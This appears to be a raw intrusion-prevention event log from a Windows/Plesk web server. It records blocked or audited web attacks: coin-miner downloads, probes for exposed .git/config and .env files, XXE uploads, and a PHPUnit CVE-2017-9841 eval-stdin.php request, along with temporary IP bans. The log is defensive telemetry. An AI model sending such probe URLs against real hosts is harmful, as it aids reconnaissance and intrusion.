00000db9	01dc9469836ffdd4	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc94695d18cd64	01dc94695d18cd64	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQ4MjY4LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDUyNjM5MDU4LCJ1aWQiOiI5QzUwN0EwQS0wMDVBLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI1RDE1Rjc5MC05NDY5LTExRjEtQkVFRi04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0wNjYxN2MxNy0wNWFiLTQ1ODEtYTgxMC00YmY2ZTliOWIzMmIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjozMDcxNiwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA0MzQzMTQxOSwidWlkIjoiMDQ2ODJBQjUtMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000f0c4	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770053313.3844249248504638671875			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003a5	01dc9469c5e8366f	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc94699fb943a3	01dc94699fb943a3	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjlGQjZDREI2LTk0NjktMTFGMS05QUUxLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00002568	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://phutungfordsaigon.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b3	01dc9469d3312292	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc9469ace14871	01dc9469ace14871	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFDRTAwQzQzLTk0NjktMTFGMS05MDY2LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000c124	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://hostmaster.pointarchitect.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b3	01dc946a9debc914	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc946a7761c84b	01dc946a7761c84b	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijc3NjE2N0I4LTk0NkEtMTFGMS04NzU1LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000cd64	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://info.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000213	01dc946ac2703e2a	000000cf	00000007	164a8367	ae287c4f	00000001	00000000	00000001	01dc946ac14af925	01dc946c26ebb525	00000001	00000000	The client will block traffic from IP address 79.124.40.174 for the next 600 seconds (from 2/3/2026 12:38:34 AM to 2/3/2026 12:48:34 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003be	01dc946ae6f83192	000000ce	00000003	164a8367	ae287c4f	00000002	00000001	00000001	01dc946ac1010fa8	01dc946ac1010fa8	00000001	0000011c	[SID: 29834] Web Attack: XML External Entity Attack attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkMwRkU4OUI1LTk0NkEtMTFGMS1BNDM1LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6Mjk4MzQsIm5hbWUiOiJXZWIgQXR0YWNrOiBYTUwgRXh0ZXJuYWwgRW50aXR5IEF0dGFjayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000748a	00010002	00000002	00000002	0000bf02	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: XML External Entity Attack	http://103.131.74.22:80/Autodiscover/Autodiscover.xml			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fa	01dc946ae6f83192	000000ce	00000003	164a8367	ae287c4f	00000002	00000001	00000001	01dc946ac17aab60	01dc946ac17aab60	00000001	00000134	[SID: 31554] Web Attack: Malicious XML External Entity Payload Upload attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkMwRkU4OUI0LTk0NkEtMTFGMS1BNDM1LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE1NTQsIm5hbWUiOiJXZWIgQXR0YWNrOiBNYWxpY2lvdXMgWE1MIEV4dGVybmFsIEVudGl0eSBQYXlsb2FkIFVwbG9hZCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007b42	00010001	00000002	00000002	0000bf02	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Malicious XML External Entity Payload Upload	http://103.131.74.22:80/Autodiscover/Autodiscover.xml			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000216	01dc946aea4dbfb7	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc946ac371bdba	01dc946ac371bdba	00000001	00000000	Active Response that started at 2/3/2026 12:28:36 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000216	01dc946c4df831b9	000000d3	0000000f	164a8367	ae287c4f	00000001	00000000	00000000	01dc946c271b6966	01dc946c271b6966	00000001	00000000	Active Response that started at 2/3/2026 12:38:34 AM is disengaged. The traffic from IP address 79.124.40.174 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000212	01dc946c61e4c0b4	000000cf	00000007	164a8367	ae287c4f	00000001	00000000	00000001	01dc946c5f066394	01dc946dc4a71f94	00000001	00000000	The client will block traffic from IP address 79.124.40.174 for the next 600 seconds (from 2/3/2026 12:50:08 AM to 2/3/2026 1:00:08 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b9	01dc946c6f355452	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc946c4aa501cc	01dc946c4aa501cc	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjRBQTI3QkJELTk0NkMtMTFGMS1CQjRGLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000a3e0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://informatik.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003f1	01dc946c8329e484	000000ce	00000003	164a8367	ae287c4f	00000002	00000001	00000001	01dc946c5e5ab95f	01dc946c5e5ab95f	00000001	0000013c	[SID: 30921] Web Attack: PHPUnit RCE CVE-2017-9841 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjVFNTc5MkVBLTk0NkMtMTFGMS1CMzk0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMTctOTg0MSIsImlkIjozMDkyMSwibmFtZSI6IldlYiBBdHRhY2s6IFBIUFVuaXQgUkNFIENWRS0yMDE3LTk4NDEiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000078c9	00010009	00000002	00000002	00009ba0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: PHPUnit RCE CVE-2017-9841	http://103.131.74.22:80/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000212	01dc946cc5a8c955	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc946cc58c2cb7	01dc946e2b2ce8b7	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 12:53:00 AM to 2/3/2026 1:03:00 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003cb	01dc946ccfa72c1e	000000ce	0000000f	164a8367	02400a22	00000002	00000002	00000001	01dc946cabcf382d	01dc946cabcf382d	00000001	00000128	[SID: 33269] Audit: Possible Misconfigured Symfony Application attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFCQ0VCNzkxLTk0NkMtMTFGMS05MjExLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMyNjksIm5hbWUiOiJBdWRpdDogUG9zc2libGUgTWlzY29uZmlndXJlZCBTeW1mb255IEFwcGxpY2F0aW9uIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000081f5	00010000	00000002	00000002	0000d60c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Possible Misconfigured Symfony Application	http://api.shopappstore.vn/_profiler/phpinfo			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c3	01dc946cd64715b8	000000ce	0000000f	164a8367	02400a22	00000002	00000002	00000001	01dc946caf8264d0	01dc946caf8264d0	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFGODI1MEYzLTk0NkMtMTFGMS05NTlFLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000c493	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://api.shopappstore.vn/.env/.env.bak			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000db9	01dc946cea3a550f	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc946cc4f39554	01dc946cc4f39554	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjM0MDA0LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDUzNjMzMDk1LCJ1aWQiOiI0QTI2MDU3QS0wMDVDLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiJDNEU5OUI3Ni05NDZDLTExRjEtOEM5OS04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0wNjYxN2MxNy0wNWFiLTQ1ODEtYTgxMC00YmY2ZTliOWIzMmIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjozMDcxNiwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA0MzQzMTQxOSwidWlkIjoiMDQ2ODJBQjUtMDAyNy1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000e93f	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770054772.9982049465179443359375			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003b0	01dc946d793c2f2e	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc946d54119707	01dc946d54119707	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjU0MTBDNjY3LTk0NkQtMTFGMS04OEE0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000aa50	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://i.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000216	01dc946dea47b515	000000d3	0000000f	164a8367	ae287c4f	00000001	00000000	00000000	01dc946dc4e538ee	01dc946dc4e538ee	00000001	00000000	Active Response that started at 2/3/2026 12:50:08 AM is disengaged. The traffic from IP address 79.124.40.174 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000216	01dc946e514f1489	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc946e2b630c65	01dc946e2b630c65	00000001	00000000	Active Response that started at 2/3/2026 12:53:00 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000211	01dc9471e9e12f13	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc9471e7b80ab7	01dc94734d58c6b7	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 1:29:45 AM to 2/3/2026 1:39:45 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc94720e72cc84	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc9471e7b3463b	01dc9471e7b3463b	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQ0NTI0LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDU2ODQ2NDE5LCJ1aWQiOiI0Q